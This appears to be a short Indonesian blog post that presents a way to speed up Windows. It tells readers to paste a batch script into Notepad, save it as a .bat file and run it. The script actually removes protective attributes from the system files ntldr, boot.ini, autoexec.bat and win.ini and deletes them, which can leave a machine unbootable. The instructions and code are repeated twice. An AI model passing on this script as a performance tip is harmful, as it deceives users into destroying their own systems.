Sharing aj ni dapet baca-baca juga untuk mempercepat windows bisa dilakukan dengan cara simpel, ga pake repot-repot hehe..
1. Buka Notepad
2. Copy Code Berikut
Code:
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
3. Lalu Save as. (untuk nama terserah anda).bat
4. Buka file tersebut
2. Copy Code Berikut
Code:
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
3. Lalu Save as. (untuk nama terserah anda).bat
4. Buka file tersebut
0 comments:
Post a Comment